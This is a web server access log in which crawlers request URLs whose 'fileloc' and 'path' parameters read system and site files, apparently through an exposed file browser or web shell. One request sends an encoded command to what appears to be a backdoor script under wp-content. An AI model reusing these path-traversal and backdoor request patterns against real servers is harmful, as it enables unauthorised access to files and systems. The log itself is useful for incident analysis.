216.73.216.50 - - [09/Nov/2025:01:12:45 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fc6x%2Finclude%2Fasm%2Fflat.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fc6x%2Finclude%2Fasm HTTP/1.0" 200 3095 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:46 +0000] "GET /q-~246uEuMHEySiCvGfksRZFD4WpzgvpO2dk21687/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:46 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Ftools%2Ftesting%2Fselftests%2Fkselftest_install.sh&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Ftools%2Ftesting%2Fselftests HTTP/1.0" 200 3320 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:46 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Furllib%2Frequest.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Furllib HTTP/1.0" 200 29537 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:46 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fusr%2Flib%2Fpython3.8%2Fdistutils%2Fcommand%2F__pycache__%2Fsdist.cpython-38.pyc&path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Fusr%2Flib%2Fpython3.8%2Fdistutils%2Fcommand%2F__pycache__ HTTP/1.0" 200 2914 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:47 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Flib2to3%2Ffixes%2Ffix_zip.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Flib2to3%2Ffixes HTTP/1.0" 200 3491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:47 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory12/node0/cpu1 HTTP/1.0" 200 3686 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:12:47 +0000] "GET /q-~170WtBFeis4fnQAxauCPfc3DkbLzzwGAS44515/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:47 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade%2FDistUpgradeViewText.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade HTTP/1.0" 200 6922 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:48 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fpowerpc%2Finclude%2Fuapi HTTP/1.0" 200 3190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:48 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fsos%2Fcollector%2Fsosnode.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fsos%2Fcollector HTTP/1.0" 200 12594 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:49 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Farm%2Finclude%2Fasm%2Fpage.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Farch%2Farm%2Finclude%2Fasm HTTP/1.0" 200 4055 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.226.34.98 - - [09/Nov/2025:01:12:49 +0000] "GET /our-works/tvc-kimino/?path=//usr/lib/dovecot/modules HTTP/1.0" 200 4997 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.189 - - [09/Nov/2025:01:12:49 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory14/node0/memory0 HTTP/1.0" 200 3611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [09/Nov/2025:01:12:50 +0000] "GET /q-~244DdkSsYinOThkskYlZNvtcLBxQO15Ab29905/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:50 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Fspread%2Fpublish.py&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Fspread HTTP/1.0" 200 4486 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:50 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fasyncio%2Fbase_futures.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3.8%2Fasyncio HTTP/1.0" 200 3889 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:51 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fclick%2Fdecorators.py&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fclick HTTP/1.0" 200 5916 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:51 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Fperl%2F5.30.0%2FExtUtils%2FMM_Unix.pm&path=%2F%2Fusr%2Fshare%2Fperl%2F5.30.0%2FExtUtils HTTP/1.0" 200 38508 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:52 +0000] "GET /q-~265ndTBysuPSquJaxbIEFCXj7HxAozC7w37894/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:12:52 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory14/node0/memory1 HTTP/1.0" 200 3612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:52 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fhttplib2%2Fcerts.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fhttplib2 HTTP/1.0" 200 3249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:52 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Fkeyring%2Fbackends%2FWindows.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Fkeyring%2Fbackends HTTP/1.0" 200 4513 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:53 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Futil.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3.9%2Fdistutils HTTP/1.0" 200 10435 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
44.215.210.112 - - [09/Nov/2025:01:12:53 +0000] "GET /our-works/tvc-calci/?path=//var/lib/snapd/device HTTP/1.0" 200 3156 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:12:53 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmultiprocessing%2F__pycache__%2Futil.cpython-38.pyc&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Flib%2Fpython3.8%2Fmultiprocessing%2F__pycache__ HTTP/1.0" 200 2899 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:53 +0000] "GET /q-~19ZzHucTS0EpQgRloASsxLPXj2NDfV7C45288/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:53 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade%2FDistUpgradeView.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade HTTP/1.0" 200 8378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:54 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Fsensors%2Fadt7310.h&path=%2F%2Fusr%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Fconfig%2Fsensors HTTP/1.0" 200 2897 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:54 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory13/node0/memory9 HTTP/1.0" 200 3612 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:55 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Fdoc%2Fpython3-software-properties%2FREADME&path=%2F%2Fusr%2Fshare%2Fdoc%2Fpython3-software-properties HTTP/1.0" 200 3059 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:55 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fpython3.9%2Fdistutils%2Ffile_util.py&path=%2F%2Fsnap%2Fcore20%2Fcurrent%2Flib%2Fpython3.9%2Fdistutils HTTP/1.0" 200 5569 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
40.77.167.52 - - [09/Nov/2025:01:12:55 +0000] "GET /?products=1741918890 HTTP/1.0" 200 27436 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:12:56 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fsnap%2Fcore20%2F2669%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Fdir_util.py&path=%2F%2Fsnap%2Fcore20%2F2669%2Fusr%2Flib%2Fpython3.9%2Fdistutils HTTP/1.0" 200 5796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:56 +0000] "GET /q-~175vMN9hp7fkJXEejwSBGsvPHKZMwoUEu49840/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:57 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Ftesting%2Fselftests%2Fmount%2Frun_tests.sh&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Ftools%2Ftesting%2Fselftests%2Fmount HTTP/1.0" 200 3084 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:58 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Fpastebin.d%2Fpaste.openstack.org.conf&path=%2F%2Fusr%2Fshare%2Fpastebin.d HTTP/1.0" 200 2994 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:12:58 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory14/node0/memory6 HTTP/1.0" 200 3615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
184.72.95.195 - - [09/Nov/2025:01:12:58 +0000] "GET /our-works/tvc-calci/?path=//lib/python3/dist-packages/colorama-0.4.3.egg-info HTTP/1.0" 200 3302 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:12:58 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fulpi%2Finterface.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Fulpi HTTP/1.0" 200 3154 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:12:59 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fcoccinelle%2Fmisc%2Fifaddr.cocci&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fscripts%2Fcoccinelle%2Fmisc HTTP/1.0" 200 3264 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:12:59 +0000] "GET /q-~223wgZblTXKvMIhKyopKg3QBzGGuX0WQU29786/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:12:59 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fmore_itertools%2Ftests%2Ftest_more.py&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fmore_itertools%2Ftests HTTP/1.0" 200 15022 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:00 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Ffirmware%2Fbroadcom%2FMakefile&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Fdrivers%2Ffirmware%2Fbroadcom HTTP/1.0" 200 2974 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:02 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory14/node0/memory7/node0/memory3 HTTP/1.0" 200 3618 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:02 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fsnap%2Fcore20%2Fcurrent%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Fcommand%2Fbuild_clib.py&path=%2F%2Fproc%2Fthread-self%2Froot%2Fsnap%2Fcore20%2Fcurrent%2Fusr%2Flib%2Fpython3.9%2Fdistutils%2Fcommand HTTP/1.0" 200 5194 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:02 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216-generic%2Finclude%2Fconfig%2Ffunction HTTP/1.0" 200 3346 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
98.84.184.80 - - [09/Nov/2025:01:13:03 +0000] "GET /our-works/tvc-lapatie-2/?path=//sys/bus/node/devices HTTP/1.0" 200 3144 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [09/Nov/2025:01:10:42 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323635343234322p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323635303634322q3337356264326635333361623738363033633239623766313539373634373336222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 200 211 "-" "-"
74.7.227.51 - - [09/Nov/2025:01:13:03 +0000] "GET /q-~251L1OxHZvVJDOtgNriWOhdGxizyjqa8k38494/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:04 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Ftemplates%2Fjavascript%2Fvariables.twig&path=%2F%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Ftemplates%2Fjavascript HTTP/1.0" 200 4412 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:04 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Flockd%2Fshare.h&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fsrc%2Flinux-headers-5.4.0-216%2Finclude%2Flinux%2Flockd HTTP/1.0" 200 3270 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:04 +0000] "GET /?path=//sys/bus/node/devices/node0/memory7/subsystem/devices/memory14/node0/memory9 HTTP/1.0" 200 3615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:04 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3.8%2Fasyncio%2F__pycache__%2Ftrsock.cpython-38.pyc&path=%2F%2Flib%2Fpython3.8%2Fasyncio%2F__pycache__ HTTP/1.0" 200 2861 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:05 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fuaclient%2F__pycache__%2Factions.cpython-38.pyc&path=%2F%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fuaclient%2F__pycache__ HTTP/1.0" 200 2884 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
100.29.160.53 - - [09/Nov/2025:01:13:05 +0000] "GET /our-works/tvc-lapatie-2/?path=//usr/share/doc/ubuntu-pro-client HTTP/1.0" 200 3232 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [09/Nov/2025:01:13:05 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fsymfony%2Fconfig%2FResourceCheckerInterface.php&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Ffastpanel2-phpmyadmin%2Fvendor%2Fsymfony%2Fconfig HTTP/1.0" 200 3460 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:13:06 +0000] "GET /q-~61aNTjsfMqR5fS9C9UlZiyjVIyPnonbA30964/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:06 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm%2Ffixmap.h&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Farch%2Fnds32%2Finclude%2Fasm HTTP/1.0" 200 3326 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.189 - - [09/Nov/2025:01:13:06 +0000] "GET /?path=//sys/bus/node/devices/node0/memory1/subsystem/devices/memory13/node0/memory4 HTTP/1.0" 200 3611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.50 - - [09/Nov/2025:01:13:06 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade%2FMetaRelease.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2FDistUpgrade HTTP/1.0" 200 7789 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:07 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Fplugins%2Ftwisted_conch.py&path=%2F%2Flib%2Fpython3%2Fdist-packages%2Ftwisted%2Fplugins HTTP/1.0" 200 3136 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:07 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fserial%2Fserialposix.py&path=%2F%2Fproc%2Fself%2Froot%2Fusr%2Flib%2Fpython3%2Fdist-packages%2Fserial HTTP/1.0" 200 10530 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.50 - - [09/Nov/2025:01:13:07 +0000] "GET /our-works/tv-commercial/tvc-tet-sum-vay?fileloc=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fkconfig%2Fgconf.c&path=%2F%2Fusr%2Fsrc%2Flinux-headers-5.4.0-214%2Fscripts%2Fkconfig HTTP/1.0" 200 12233 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [09/Nov/2025:01:13:08 +0000] "GET /q-~122LHGtdjxXvmQlYDJ4Xc3nlukWBNWDMy31551/?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/index.php0&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 17358 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [09/Nov/2025:01:13:08 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory14/node0/memory8 HTTP/1.0" 200 3613 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
